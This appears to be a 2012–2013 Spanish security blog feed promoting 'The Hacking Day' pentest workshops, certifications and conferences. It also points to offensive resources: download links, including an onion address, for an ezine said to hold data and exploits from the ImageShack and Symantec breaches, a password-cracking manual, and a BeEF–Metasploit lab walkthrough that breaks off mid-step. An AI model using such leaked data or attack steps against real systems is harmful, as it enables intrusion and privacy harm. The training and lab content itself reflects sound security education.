THE HACKING DAY BLOG

Asi fue - “The Hacking Day” Cali

noreply@blogger.com (ThDjca) — Mon, 17 Jun 2013 19:08:36 PDT

Con una excelente participación y gracias a la organización de la empresa Partner Security IT and Criminal Law Consulting, en las excelentes instalaciones de la Universidad Autónoma de Occidente en la ciudad de Cali, se llevó a cabo el primer Taller de Hacking Day.

Las sorpresas no aguardaron cuando en el inicio de las clases el docente “Jhon Cesar Arango” cambio el temario de Pentesting con BackTrack a "Pentesting con KALI", noticia que fue del agrado de los asistentes, así mismo la empresa FronTech decidió apoyar el evento con algunos refrigerios y souvenirs.

Las 10 horas de clases fueron suficientes para dar a conocer las bondades de la nueva Suite de seguridad KALI y fue tan amena la clase que no hubo preocupación por observar el partido que en ese momento se jugaba en la tarde entre Colombia y Argentina. (por cierto quedaron empatados 1-1)

Agradecemos a las instituciones y personas que hicieron posible, este taller

ThDJca

Bolivia: Entre la Fiadi y la Certificación “The Hacking Day”

noreply@blogger.com (ThDjca) — Sun, 09 Jun 2013 09:07:20 PDT

Después de mi última visita a la hermosa ciudad de Santa Cruz de la Sierra en Bolivia, fueron muchos los proyectos que quedaron pendientes, pues bien aquí comento ya la conclusión de algunos de ellos…

Lo primero tiene que ver con la FIADI (Federación Iberoamericana de Asociaciones de Derecho e Informática) quienes han posicionado año tras año un evento de Seguridad Informática que reúne a expositores Nacionales e Internacionales en el campo del Derecho Informático y la seguridad de la información. Pues bien, este año luego de haber presentado mi Paper, recibo con agrado la noticia que fue aceptada mi participación, como expositor a la versión XVII Congreso Iberoamericano FIADI 2013, será un honor para mí, poder estar nuevamente en su hermoso país.

Para mayor información de este congreso, no dude visitar:

http://www.congresofiadi.org.bo/

La otra noticia, tiene que ver con la certificaciones del proyecto “The Hacking Day”, pues bien; en Santa Cruz de la Sierra, en la Universidad Autónoma “Gabriel Rene Moreno” a través de la Facultad Politécnica y el Centro de Investigaciones y Formación Técnico – Tecnológica se llevara a cabo la Certificación “THD-Ethical Pentester Certified” donde el asistente aprenderá como comprometer la seguridad de toda una organización utilizando las mismas técnicas, herramientas y metodología usada por atacantes reales, de la misma manera conociendo las posibles fallas en la protección de la información estará en capacidad de aplicar las contramedidas para contra restar estos ataques.

El training es un curso 90% práctico - 10% teórico, en donde el asistente será constantemente enfrentado a nuevos desafíos, con la guía del instructor, donde permite ver todos los talleres que hace parte de la certificación con una duración de 48 horas.

Lo que incluye este curso con opción a certificación es:

Material impreso del curso para cada uno de los participantes. (Contiene más de 150 hojas explicativas y más de 60 laboratorios prácticos paso a paso por cada uno de los temas)
Máquinas Virtuales
Placa Wireless para ataques a redes Wi-Fi
Souvenirs para cada asistente.
Certificados de asistencia al curso, con el nombre de cada uno de los participantes y la intensidad horaria del curso.
Voucher del Examen de Certificación (THD-EPC)
Participación al final de un WarGame con buenos premios

La Agenda para este año, es de Julio 29 a Agosto 3 del presente año, en un horario de 8:00 Am – 12:00m y de 2:00 Pm a 6:00 Pm.

Para mayor información del Training visite la página:

http://www.thehackingday.com/epc_cert.html

nos veremos pronto

ThdJca

Guayaquil – Ecuador == Listo para los Talleres THD y la Certificación THD-EPC

noreply@blogger.com (ThDjca) — Tue, 11 Jun 2013 13:13:48 PDT

Una total asistencia fue el balance de la gira promocional realizada por “The Hacking Day” a través de nuestro buen amigo y aliado Roberto Olaya (Hack Security). Quien con poco esfuerzo deja el nombre de Ecuador en alto a través de su buena atención y gestión.

Las charlas “Hackeando con Buscadores”, “Ataques a la redes Inalámbricas” y “Se el primero en Atacar tu Web”, fueron el abre bocas perfecto para dar a conocer parte de los contenidos de la Talleres y la Certificación “THD-Ethical Pentester Certified”.

Quienes pensábamos que Roberto Olaya tenia voz de vendedor de Aguacates, no se equivocaba… pues gracias a su armoniosa voz y en la compañía de Joseph se tuvo la oportunidad de realizar un programa de radio en las instalaciones de la Universidad Católica de Santiago de Guayaquil:

Lo otro a destacar es que durante las charlas pensamos ver a nuestro amigo DragonJar. A lo que Roberto con un pequeño codazo que aún me duele, me dice “mira mi hermano, mira quien esta atrás”, al ver con detenimiento la respuesta es inmediata: “uyyy es Jaime (DragonJar)”, “Pero que está haciendo en Ecuador???”.

Pues no nos aguantamos las ganas de tomarnos las fotos con el clon mejorado de Jaime (DragonJar), una persona al igual que el original: simpática y amable.

Lo otro a destacar en la Gira, es el excelente menú gastronómico:

No queda más que agradecer a las Universidad Católica de Santiago de Guayaquil (quien será la sede de los Talleres y la Certificación), la Universidad Estatal de Guayaquil, a la Universidad Politécnica Salesiana, Roberto Olaya, Salome y a Joseph (nuestro conductor elegido) la calorosa acogida a nuestro proyecto y a las charlas de seguridad.

Nuestra Agenda Confirmada de Talleres:

28 De Junio de 2013

29 De Junio de 2013

30 De Junio de 2013

Inscripciones: Haciendo Clic Aquí

Nuestra Agenda Confirmada para la Certificación - THD-EPC:

THD-EPC The Hacking Day – Ethical Pentester Certified

En el THD-EPC el asistente aprenderá como comprometer la seguridad de toda una organización utilizando las mismas técnicas, herramientas y metodología usada por atacantes reales, de la misma manera conociendo las posibles fallas en la protección de la información estará en capacidad de aplicar las contramedidas para contra restar estos ataques.

El training es un curso 90% práctico - 10% teórico, en donde el asistente será constantemente enfrentado a nuevos desafíos, con la guía del instructor.

Este curso será realizado entre el 2 y 7 de Septiembre del 2013.

Los beneficios de la agenda intensiva a diferencia de los talleres individuales, los asistentes obtienen:

Material impreso del curso para cada uno de los participantes. (Contiene más de 150 hojas explicativas y más de 60 laboratorios prácticos paso a paso por cada uno de los temas)
Máquinas Virtuales
Placa Wireless para ataques a redes Wi-Fi
Souvenirs para cada asistente.
Certificados de asistencia al curso, con el nombre de cada uno de los participantes y la intensidad horaria del curso.
Voucher del Examen de Certificación (THD-EPC)
Participación al final de un WarGame con buenos premios

Para mayor información del Training e inscripciones visite la página:

http://www.thehackingday.com/epc_cert.html

Hasta Pronto

ThdJca

Libros gratuitos de seguridad de la serie "For Dummies"

noreply@blogger.com (ThDjca) — Fri, 31 May 2013 17:14:12 PDT

La serie de libros "For Dummies" (de la editorial Wiley) es muy popular por tener manuales técnicos sencillos, aunque no por ello poco potentes técnicamente. Estos libros suelen tener un precio de entre 20 a 40 dólares y abarcar decenas de temáticas, incluidos libros de seguridad.

Pero además de los libros tradicionales, también han creado guías resumidas, escritas en inglés, que en ocasiones son realmente útiles para introducirse en temas concretos rápidamente. Estas guías (que son mini-libros realmente) están patrocinadas por algunos fabricantes y se pueden descargar sin ningún coste. Eso sí, para acceder a algunos de ellos hace falta registrarse en su web (1 minuto) para que nos manden el enlace a nuestro correo electrónico.

Lista de Libros:

[Solera] Big Data Security for Dummies
http://pages.soleranetworks.com/BigDataSecurityforDummies.html

[Lancope] Netflow security monitoring for Dummies
http://www.lancope.com/netflow-for-dummies/

[TrendMicro] IT Security for Dummies
http://campaign.trendmicro.com/forms/it_security_for_dummies_530

[PaloAlto] Modern Malware for Dummies
http://www.accumuli.com/pages/files/Modern_Malware_for_Dummies_Guide.pdf

[PaloAlto] Next-Generation Firewalls
http://www.bradreese.com/blog/firewalls-for-dummies.pdf

[PaloAlto] Network Security in Virtualized Data Centers for Dummies
http://connect.paloaltonetworks.com/nsvdc-4dummies-EN

[Avaya] VoIP Security for Dummies
http://www.penninetelecom.com/files/VoIP_Security_for_Dummies.pdf

[Avaya] Converged Network Security for Dummies
http://www.unitytelecom.net/dummies/CNSfordummies.pdf

[Sophos] Securing Smartphones & Tables for Dummies
http://www.sophos.com/en-us/security-news-trends/security-trends/securing-smartphones-and-tablets-for-dummies-register.aspx

[Fortinet] Unified Threat Management for Dummies
http://www.fortinet.com/sites/default/files/whitepapers/FTNT_UTM_For_Dummies.pdf

[Qualys] IT Policy Compliance for Dummies
http://www.qualys.com/forms/ebook/it-policy-compliance-for-dummies/?leadsource=8558941&kw=security+policy+compliance

[Qualys] Vulnerability Management for Dummies
http://www.lsec.be/upload_directories/documents/2011/VM_for_Dummies.pdf

[Qualys] Web Application Security for Dummies
http://static.progressivemediagroup.com/Uploads/WhitePaper/912/96bb16b0-5a62-4345-aa92-0fd402e85953.pdf

[Qualys] PCI Compliance For Dummies
https://www.qualys.com/forms/ebook/pcifordummies/

[Tripwire] Security Configuration Management for Dummies
http://www.tripwire.com/scm

[corero] DDoS for Dummies
http://www.ireo.com/fileadmin/docs/documentacion_de_productos/Corero/Corero%20-%20DDoS%20for%20dummies.pdf

Fuente Original: Security By Default: http://bit.ly/11bkHah

ThDJca

Gira Promocional "The Hacking Day" Guayaquil - Ecuador

noreply@blogger.com (ThDjca) — Fri, 24 May 2013 06:29:54 PDT

Con el fin de promocionar los diferentes Talleres de Hacking Day y la Certificación "THD-Ethical Pentester Certified", el equipo académico THD realizara una serie de charlas técnicas en la Ciudad de Guayaquil.

La Universidad Católica de Santiago de Guayaquil, La Universidad de Guayaquil (Estatal) y Universidad Politécnica Salesiana, serán los anfitriones para dicha gira.

En las charlas se darán las fechas de los talleres especializados al estilo "The Hacking Day", asi como la fecha de la Certificación

Las charlas son Organizadas por HACK Security - Asesores de Seguridad Lógica

ThDJca

0xWord La nueva Marca de los Libros de Informatica 64

noreply@blogger.com (ThDjca) — Tue, 21 May 2013 12:27:19 PDT

Hace tiempo los amigos de Informatica 64, estaban trabajando sin parar en la editorial de libros de seguridad informática y hacking, y hoy es el día en que se ha hecho realidad. En primer lugar, y lo más importante es el nuevo cambio de nombre de la editorial de libros, a la que se ha bautizado como 0xWord y donde no solo tenéis a la venta los libros que ya teníamos disponibles, sino que hemos añadido muchas sorpresas.
dentro de las novedades se encuentran los siguientes titulos:

Ya en colombia la empresa IT Forensic, hizo el pedido de las nuevas publicaciones y estima su llegada el 15 de Junio.

ThdJca

CERTIFICACIONES "THE HACKING DAY - PROJECT"

noreply@blogger.com (ThDjca) — Fri, 24 May 2013 14:28:00 PDT

Gracias a la acogida del proyecto “The Hacking Day”, en países como: Venezuela, Ecuador, Argentina, Bolivia y por su puesto Colombia. Para el presente año se reúne lo mejor de sus talleres prácticos en varias certificaciones internacionales llamadas:

THD-EPC     The Hacking Day – Ethical Pentester Certified
THD-CMF    The Hacking Day – Computer & Movil Forense
THD-PWT    The Hacking Day – Professional Web Tester

THD-EPC The Hacking Day – Ethical Pentester Certified

En el THD-EPC el asistente aprenderá como comprometer la seguridad de toda una organización utilizando las mismas técnicas, herramientas y metodología usada por atacantes reales, de la misma manera conociendo las posibles fallas en la protección de la información estará en capacidad de aplicar las contramedidas para contra restar estos ataques.

Los talleres que comprenden esta certificación son:

THD-3 Pentesting con Backtrack - http://thehackingday.com/thd3.html
THD-4 Taller Práctico de Seguridad Inalámbrica - http://thehackingday.com/thd4.html
THD-6 Descubriendo Ataques Mediante Análisis de Trafico - http://thehackingday.com/thd6.html
THD-7 Metasploit en Profundidad - http://thehackingday.com/thd7.html
THD-11 Taller Práctico de Seguridad Web - http://thehackingday.com/thd11.html
Ataques MITM ***PRONTO***
Taller de Seguridad de VoIP ***PRONTO***

THD-CMF The Hacking Day – Computer & Movil Forense

En el THD-CMF el asistente aprenderá las técnicas de manos de los expertos para el análisis forense de diferentes ambientes y plataformas, así mismo conocerá las metodologías internacionales para la manipulación de la evidencia digital.

Los talleres que comprenden esta certificación son:

THD-10 Taller Práctico Análisis Forence IOS - http://thehackingday.com/thd10.html
THD-12 Análisis Forense Dispositivos Android - http://thehackingday.com/thd12.html
THD-13 Análisis Forense Windows - http://thehackingday.com/thd13.html
Análisis Forense Dispositivos Linux ***PRONTO***
Análisis Forense Mac ***PRONTO***

THD-PWT The Hacking Day – Professional Web Tester

En el THD-PWT el asistente aprenderá a el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.

THD-11 Taller Práctico de Seguridad Web - http://thehackingday.com/thd11.html
Taller de SQL Injection ***PRONTO***
Taller Seguridad SAP WEB ***¨PRONTO***

AGENDA INTENSIVA

Para el presente año “The Hacking Day – Project” y la firma IT Forensic SAS, lanzan la primera de las certificaciones: THD-EPC a realizarse en la ciudad de Bogotá del 1 al 6 de Julio, en un horario de 8:00 Am – 12:00m y de 2:00 Pm a 6:00 Pm.

El training es un curso 90% práctico - 10% teórico, en donde el asistente será constantemente enfrentado a nuevos desafíos, con la guía del instructor, donde permite ver todos los talleres que hace parte de la certificación con una duración de 48 horas.

Los beneficios de la agenda intensiva a diferencia de los talleres individuales, los asistentes obtienen:

Material impreso del curso para cada uno de los participantes. (Contiene más de 150 hojas explicativas y más de 60 laboratorios prácticos paso a paso por cada uno de los temas)
Máquinas Virtuales
Placa Wireless para ataques a redes Wi-Fi
Souvenirs para cada asistente.
Certificados de asistencia al curso, con el nombre de cada uno de los participantes y la intensidad horaria del curso.
Voucher del Examen de Certificación (THD-EPC)
Participación al final de un WarGame con buenos premios

Para mayor información del Training visite la página: http://www.thehackingday.com/epc_cert.html

PREGUNTAS Y RESPUESTAS SOBRE LA CERTIFIACIÓN

¿COMO CERTIFICARSE?

Para acceder al Voucher para presentar las diferentes certificaciones los asistentes deberán presentar o demostrar haber participado en cada uno de los talleres que lo comprende. Otra forma es esperar la agenda intensiva (de una semana) de las diferentes certificaciones que se darán en los diferentes ciudades de los diferentes países.

¿QUE COSTO TIENE LA CERTIFICACION?

No tiene ningún costo, para los asistentes a los talleres que comprenden cada una de las certificaciones del proyecto “The Hacking Day”. En caso del curso intensivo, el precio incluye la Certificación.

¿ES POSIBLE OBTENER EL VOUCHER DE CERTIFICACION SIN HABER TOMADO LOS TALLERES O HABER TOMADO SOLO ALGUNO DE LOS QUE COMPRENDE LA CERTIFICACION?

Si es posible, para ello debe cancelar un costo que es proporcional al número de talleres presentados. Mayor información al correo itf@itforensic-la.com

¿UNA VEZ PRESENTADO EL EXAMEN Y OBTENIDA LA CERTIFIACION, QUE TIEMPO DE VALIDEZ TIENE?
La Certificación tiene una validez de 2 años.

¿QUE VENTAJAS TIENE ESTAR CERTIFICADO CON EL PROYECTO “THE HACKING DAY”?
Las principales ventajas se enumeran a continuación:

Estar certificado a través de un proyecto reconocido internacionalmente.
Obtener descuentos en eventos de seguridad informatica de diferentes países
Acceso permanente a la plataforma de entrenamiento, en la que podrá obtener las memorias actualizadas de cada taller.
Descuentos especiales en cursos especializados, generados por el Proyecto “The Hacking Day”.

THD-Weekend 2013 Bolivia

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Wed, 03 Apr 2013 06:41:21 PDT

Santa Cruz, Cochabamba, La Paz,

El proyecto THE HACKING DAY esta de vuelta este año algunos días atrás les contábamos que ya estábamos listos para arrancar con todo en Cali; y como era de esperar ahora le toca el turno a su hermano THD-Weekend la serie de taller que se dictan en el resto de los países (Que no sea Colombia).

En esta ocasión el turno le toco a Bolivia, con el respaldo de EHC Bolivia estaremos en las ciudades de:

Santa Cruz
Cochabamba
La Paz

En las fechas del 20 al 26 de Mayo, con los talleres de:

Pentesting Con Backtrack
Taller Practico de Seguridad Web
Metasploit En Profundidad
Taller Practico de Seguridad Wireless

Para saber exactamente el cronograma sigan este enlace para ampliar la información de fechas, contenidos de los talleres, fechas de cada uno de los talleres y precio que de una vez les adelanto se cobrara así:

Estudiantes EMI/ UAFRM: 80 $us
Estudiantes: 100 $us
Docentes EMI / UAGRM: 100 $us
Profesionales: 150 $us

Para la inscripción lo podemos hacer por este enlace: INSCRIPCIÓN

Así pues que a disfrutar y a aprender mucho les deseo muchos éxitos no solo al equipo que viaja del proyecto sino a EHC y a los asistentes, no siendo mas me despido, no sin antes decirles que ante cualquier inquietud no duden en contactar por comentarios o por los correos jca@itforensic-la.com, itf@itforensic-la.com. Ahora si hasta pronto.

Salud2

Th3h@Ck¡_@dM¡n

Proyecto The Hacking Day De Vuelta Al Ruedo

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Mon, 08 Apr 2013 09:38:40 PDT

Durante varios días hemos estado dilatando un poco esta noticia pero por fin sale a la luz.

Es para un honor para el Ing Jhon Cesar Arango mentor del proyecto, IT Forensic empresa que respalda el proyecto La Comunidad Dragonjar principal aliado y para mi Th3h@Ck¡_@dM¡n informarles que nuevamente retomamos actividades.

Después de algunos retoques y nuevas modificaciones les tenemos el cronograma oficial para estas primeras fechas, las cuales quedaron establecidas de la siguiente manera:

CALI:

Junio 6
THD-3 Pentesting con Backtrack - http://thehackingday.com/thd3.html
THD-11 Taller Práctico de Seguridad Web - http://thehackingday.com/thd11.html

Junio 7
THD-7 Metasploit en Profundidad - http://thehackingday.com/thd7.html
THD-4 Taller Práctico de Seguridad Inalámbrica - http://thehackingday.com/thd4.html

Estos talleres serán dictados en la Universidad Autónoma de Occidente.

Para las personas que se encuentran en otras ciudades y tal ves no puedan asistir a Cali, no desesperen, ya nuestro equipo logístico se encuentra trabajando y proyectando nuevas ciudades nuevos talleres y lo mas importante nuevas tecnologías para la participación de todos ustedes en este maravilloso proyecto.

Por lo pronto no dejen pasar la gran oportunidad de participar en estos talleres.

Para mayor información pueden visitar:

Salud2

Th3h@Ck¡_@dM¡n

Cerrados Los CFP Para El ACK Security Conference

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Tue, 05 Feb 2013 16:42:28 PST

Como diría un narrador de deportes Colombiano "Final, Final no va mas".

Esto se ha dicho el pasado 30/01/2013 fecha para la cual se tenia previsto el cierre definitivo de los CFP (Call For Papers) para la segunda versión del ACK Security Conference, la conferencia de seguridad informática que se realiza en la hermosa ciudad de Manizales en el precioso país de Colombia desde el año 2012.

En esta segunda versión, los invitados serán de gran categoría, algo a lo que ya estamos acostumbrados a ver en esta gran conferencia. Ellos Son:

Vladimir Katalov – Rusia

Vladimir Katalov es CEO y co-fundador de la empresa de seguridad ElcomSoft, estudio matemáticas aplicadas en el instituto de ingeniería y física de Moscú, elcomsoft se ha destacado en la industria por desarrollar el primer programa para recuperar contraseñas de archivos zip y una software para recuperar contraseñas de una gran cantidad de aplicaciones.

Vladimir Katalov constantemente da charlas relacionadas a la seguridad informática, en eventos como

TechnoSecurity, BlackHat, CEIC, Infosecurity Europe, Infosecurity Russia, Infosecurity Japan, IT Security Area (it-sa), European Police Congress, e-Crime, Troopers, EuroForensics, FT-Day, China Computer Forensic Conference, Interpolitex… entre otros.

Una de las charlas que compartirá con nosotros es producto de su mas reciente investigación y se titula: “Cracking and analyzing Apple iCloud protocols: iCloud backups, Find My iPhone, document storage.”

Michael Price – USA

Michael Price, actualmente trabaja como jefe de arquitectura para ios en Appthority, investigando a tiempo completo todo lo relacionado con el sistema operativo iOS y la seguridad del mismo, price ha sido miembro del Foundstone Research team por mas de 9 años dirigiendo un equipo internacional de investigadores de seguridad responsable de la aplicación de software diseñado para detectar fallos de seguridad en sistemas operativos y aplicaciones.

Una de las charlas que compartirá con nosotros es producto de su mas reciente investigación y se titula: “Analyzing Apps for the iPhone et al.”

Marc Rivero López – España

Marc Rivero López trabaja como analista de ecrime en la empresa S21Sec. Su principal cometido es la realización de informes de inteligencia de temas reacionados con la seguridad, analisis de malware, I+D en tecnologías ofensivas/defensivas en internet y fraude electrónico. Como miembro de un reconocido equipo antifraude, implementa medidas de protección y prevención del fraude en un destacado cliente dentro del sector bancario.

Ha sido ponente en conferencias como No cON Name, ViLaNet, RECSI y es colaborador habitual en distintas publicaciones del sector como DragonJAR, Security by Default, Flu-Project…

Una de las charlas que compartirá con nosotros es producto de su mas reciente investigación y se titula: “Ecrime evolution.”

Oscar Banchiero – Argentina

Oscar Leonardo Banchiero es Especialista en Seguridad Informática, Instructor de cursos de Ethical Hacking, Wireless y Seguridad Android, ha estado a cargo de configuraciones en la RED MPLS e INTERNET de Argentina, instaladas en grandes clientes del país, esta certificado como CCNP Security, CEH, UCAD y ha sido ponente en varios eventos nacionales e internacionales: Telefónica, Infosecurity Latinoamérica, CXO Community

Una de las charlas que compartirá con nosotros es producto de su mas reciente investigación y se titula: “Ingeniería “en ganar””

Felipe Montecino – Chile

Felipe Montecino se desempeña actualmente como Administrador de sistemas (sysadmin), investigador (Security Researcher) y programador en algunas ocasiones. CoFundador del proyecto secureless, Fundador del proyecto Arduinoday, Miembro de hacklabcl (Kernelhouse). Tiene intereses personales son la música, seguridad en general, criptografía, programación, reversing, malware y pentesting entre otros.

Una de las charlas que compartirá con nosotros es producto de su mas reciente investigación y se titula: “Evasion de firewalls, proxys y otros”

Omar Palomino – Perú

Omar Palomino es Ingeniero de Sistemas, Magister en Gestión de TI de la Universidad San Martín de Porres (USMP) en Perú y consultor de seguridad informática con más de 5 años de experiencia en seguridad de información trabajando para empresas del sector financiero y de seguros en Perú.

Autor y escritor del blog http://www.el-palomo.com donde comparte conocimiento de seguridad informática y de información de manera abierta y fácil para todos. Certificado CEHv6, CEHv7, Security+ e ITILv3.

Una de las charlas que compartirá con nosotros es producto de su mas reciente investigación y se titula: “Android Mobile Hacking: Destripando al androide”

De todo corazón, Mil gracias a todos los investigadores que enviaron sus trabajos al CFP del ACK Security Conference 2013.

Más Info: ACK Security Conference en The Hacking Day

www.acksecuritycon.com

Hasta pronto y nos vemos en Manizales

Salud2
Th3h@Ck¡_@dM¡n

HashCat Manual En Español

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Fri, 18 Jan 2013 05:45:13 PST

Feliz Año Nuevo!! a todos los lectores de este fabuloso Blog, donde nos encanta compartir con todos ustedes curiosidades y recursos de seguridad informatica.

Y como dice la canción Año Nuevo, Vida Nueva y en nuestro caso contenidos nuevos; y en ese mismo camino de ideas pues les dejamos el manual en español de HASHCAT.

Hace algunos días los muchachos de MEXICANH TEAM han publicado un manual de HashCat completico donde se explica en español como usar esta Fabulosa herramienta que es capaz de crackear más de 30 algoritmos de encriptación.

Indice:

AVISO LEGAL ................................................................. 3
ACERCA ...................................................................... 4
1.1 VISTA GENERAL ........................................................... 5
1.2 OPCIONES ................................................................ 7
1.3 VECTORES DE ATAQUE ...................................................... 15
1.4 EJEMPLOS ................................................................ 16
1.5 ESPECIFICOS HASHCAT ..................................................... 25
2.1 OCLHASHCAT-PLUS(CUDAHASHCAT-PLUS) ....................................... 25
2.1 OPCIONES ................................................................ 27
2.2 VECTORES DE ATAQUE ...................................................... 34
2.3 RULE-BASED ATTACK ....................................................... 35
2.4 EJEMPLOS ................................................................ 39
2.5 HASHCAT UTILS ........................................................... 48
2.6 SOLUCION DE PROBLEMAS ................................................... 50
2.7 REFERENCIAS ............................................................. 50
2.8 MEJORAS ................................................................. 50

Y ahora si sin mas ni mas les dejo el documento para la descarga oficial

Manual Hashcat en español
Paginas: 50
Peso: 2,98 MB

No me queda si no decirles que lo disfruten y aprendan muchoooooo!!!

Salud2
Th3h@Ck¡_@dM¡n

Lecturas Recomendadas Para los Más Lectores. ;)

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Thu, 06 Dec 2012 16:39:34 PST

No he conocido apasionado mas come textos que los informaticos y mas precisamente los "Topos" de la seguridad informatica, la verdad es que cada dia me quedo pensando en como hacen algunos para leer, escribir sus blogs, aprender y les queda tiempo para "Trabajar" claro que me digan a cual de todos no le gusta su trabajo (Hablando de informaticos) si les pagan por hacer lo que mas les apasiona.

Pero bueno basta de tanta parla.

Mientras observaba el Blog de Zion3R (que es otro de esos personajes que me deja sorprendido), me enteraba de una revista que titula "Hacker & Developers" una revista dedicada al software libre, el hacking y la programación, que hasta ahora lleva dos ediciones, pero que promete como pocas en esta área de trabajo.

Se las dejo para que descarguen los dos volúmenes que hasta ahora se han publicado para que las disfruten y le saquen el máximo provecho!.

Sin mas en nombre del Proyecto THE HACKING DAY, les dejamos estos dos obsequios y Feliz Navidad!, JoJoJo.

Salud2
Th3h@Ck¡_@dM¡n

Penetration Testing With BackTrack By: Bucker

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Mon, 03 Dec 2012 21:26:54 PST

Es realmente sorprendente todo lo que nosotros podemos lograr con la magnifica herramienta del BackTrack y la verdad es que doy gracias a Dios por las madres y los padres que hicieron a la madre y al padre del genio que creó esta espectacularidad de herramienta.

Por eso nuestro proyecto "The Hacking Day" ofrece unos maravillosos y completisimos cursos, certificados, presenciales y con todas las de la ley para que se capaciten desde lo mas básico hasta lo mas complejo en BackTrack, pero eso es otro tema.

Lo que nos concierne por propiedad en esta entrada es un trabajo hecho por Caleb Bucker, este trabajo es un paper acerca de como hacer un pestenting con backtrack, una guía bastante completa y detallada solo espero que la disfruten así como supongo bucker disfruto haciéndola y le saquen el mayor provecho posible.

Nota: Si después de seguir este trabajo quedan antojados, pasen por la pagina oficial The Hacking Day e inscríbase a los talleres que se ofrecen, no es por que haga parte del equipo pero la verdad es que Wowwww :o sorprendentes!.

Bueno sin mas preámbulo, ni mas publicidad, les dejo el índice y los enlaces de descargas:

INTRODUCCIÓN

MÉTODOS DE ANÁLISIS DE APLICACIONES WEB
Network Mapping
Information Gathering
CMS Identification
IDS/IPS Detection
Open Source Analysis
Web Crawlers
Vulnerability Assessment and Exploitation
Maintaining Access

NETWORK MAPPING
Nmap
Netifera

INFORMATION GATHERING

TheHarvester
Maltego
CMS IDENTIFICATION

BlindElephant
CMS-Explorer
WhatWeb
IDS/IPS DETECTION

Waffit
OPEN SOURCE ANALYSIS

GHDB (Google Hacking DataBase)
Xssed

WEB CRAWLERS

WebShag
DirBuster
VULNERABILITY ASSESSMENT AND EXPLOITATION

JoomScan
SqlMap
Fimap
Shodan
W3af
Uniscan
Nikto

MAINTAINING ACCESS

Weevely
WeBaCoo
MsfPayload

CONCLUSIÓN

DOWNLOAD
http://www.sendspace.com/file/gyljvj

VER ONLINE
http://www.exploit-db.com/wp-content/themes/exploit/docs/22954.pdf

Salud2
Th3h@Ck¡_@dM¡n

Hack The Planet, Ezine #4

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Sun, 11 Nov 2012 19:39:21 PST

Hace ya algunos dias ha salido la Ezine #4, antes ya habiamos compartido la Ezine #2 (que invitamos a que le hechen un ojo por si no la han leido).

Esta nueva version trae las intruciones de Imageshack y Symantec (el antivirus). Los datos filtrados contienen información de los servidores comprometidos, así como los bugs y sus respectivos exploits utilizados para llevar a cabo el ataque.

El Indice:

                                                                   
 > ImageShack                 
 > Symantec            
 > Cryto                            
 > Pwned lineup     
 > 0dayz                 
 > Closing words              
 > Files                     
 > Shoutz                             
 > See reverse for          
 > 5-HTP

Y para que lo descarguen los enlaces:

http://pastebin.com/raw.php?i=jhLt7s83
http://htp4.hack-the-planet.tv/htp4/HTP-4.txt
http://doxbinumfxfyytnh.onion/HTP4.7z
http://uplink.sh/htp4/
http://dikline.org/
http://empathy.hardchats.org/htp4/HTP-4.txt

[+]Fuente: Blackploit

Salud2
Th3h@Ck¡_@dM¡n

ACK Security Conference! - CFP Abiertos

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Thu, 08 Nov 2012 08:15:04 PST

II ACK Security Conference 2013

Buenas, buenas, si señores asi como ya lo leyeron en el titulo el Call For Papers para la mas grande e importante y famosa conferencia de seguridad informatica en Colombia esta abierta.

El ACK Security Conference ya se encuentra andando de nuevo y todo el equipo logistico y de programa esta comenzando a moverse para llevar acabo la segunda version de la conferencia de seguridad informatica mas importante de Colombia.

Para los que no saben que es el ACK Security Conference les recomiendo lean estos dos articulos:

ACK SECUTIRY CONFERENCE... ¿DE QUÉ ME HABLAS?

Ahora bien como pueden hacer para entrar a participar como ponentes en el ACK?, eso es bien sencillo solo envian sus trabajos de investigación al correo academico@acksecuritycon.com.

Los trabajos serán recibidos hasta el 15 de Enero de 2013 y se publicaran los resultados el día 30 de enero del mismo año.

Las tematicas son las siguientes:

Clic Para Hacer Más Grande

Ojala se motiven todos a escribirnos y enviarnos sus trabajos sobre seguridad informatica al correo academico@acksecuritycon.com.

Slud2
Th3h@Ck¡_@dM¡n

Actividad Colaborativa 6 - Integracion BeEF con Metasploit

noreply@blogger.com (Th3h@Ck¡_@dM¡n) — Thu, 01 Nov 2012 13:56:21 PDT

Los estudiantes de la Universidad Autonoma de Occidente que se encuntran realizando la especializacion en seguridad informatica han hecho este excelente trabajo sobre como podemos nosotros integrar BeEF con Metasploit. Los Destacados estudiantes son Antonio Rafael Gálvez Horna, Jesús Andrés Montoya Saavedra, Jorge Andrés Cultid Mejía.

Les transcribo entonces el trabajo realizado por ellos esperamos que lo aprovechen y aprendan arto.

*********************************************************************************************************************************

Integrando un Ataque utilizando BeEF y Metasploit

Escenario:

Para el siguiente ataque estamos utilizando un escenario controlado mediante la utilización de lo siguiente:

- Maquina virtual Windows: Equipo Víctima

- Máquina virtual BackTrack R3: Equipo del Atacante con herramientas para el objetivo

- Máquina virtual BadStore 123s: Sitio Online de la Tienda Virtual vulnerable

Segmento de RED

Todas las máquinas virtuales comprenderán el segmento 192.168.0.0/24

Herramientas a Utilizar

- BeEF

- Metasploit

Alcance del Ataque

- Comprometer al Equipo Víctima

- Explotar la vulnerabilidad XSS

- Asegurar la permanencia

Mediante los plugin de Metasploit que integramos en BeEF

EMPECEMOS

PASO 1:

Vamos a integrar BeEF con Metasploit, para ello necesitamos editar el archivo config.yaml ubicado en /pentest/web/beef

En la línea

metasploit:

enable: true

Grabamos y luego nos dirigimos al directorio /pentest/web/beef/extensions/metasploit y editamos el archivo config.yaml

Modificamos las línea como se muestran a continuación, dando la IP de nuestra máquina que aloja BeEF, en este caso BT5R3, grabamos y salimos.

PASO 2

Una vez hecho las configuraciones en BeEF ejecutamos nuestro Metasploit de la siguiente manera:

Esperamos hasta que cargue por completo Metasploit y en la línea de comandos ejecutar lo siguiente:

msf> load msgrpc SeverHost=192.168.0.20 Pass=beef

Recuerden que la IP fue la que colocamos en el archive config.yaml y también seteamos nuestro password, en este caso “beef”

Listo ya tenemos los plugin a la espera de se utilizados en BeEF

PASO 3:

Ejecutamos BeEF de la siguiente manera:

